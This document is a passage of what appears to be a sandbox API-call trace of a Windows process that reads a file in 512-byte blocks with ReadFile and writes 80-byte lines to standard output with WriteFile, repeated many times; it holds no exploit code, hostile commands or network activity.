[0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.919] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, 
lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: 
lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] 
GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 
[0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.921] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.921] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] GetFileType (hFile=0x4c) returned 0x1 [0092.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.922] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.922] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType 
(hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.923] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.923] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.923] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.923] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.923] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.923] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, 
lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] GetFileType (hFile=0x4c) returned 0x1 [0092.924] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.924] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.924] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.924] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.924] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.925] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.925] GetFileType (hFile=0x4c) returned 0x1 [0092.925] 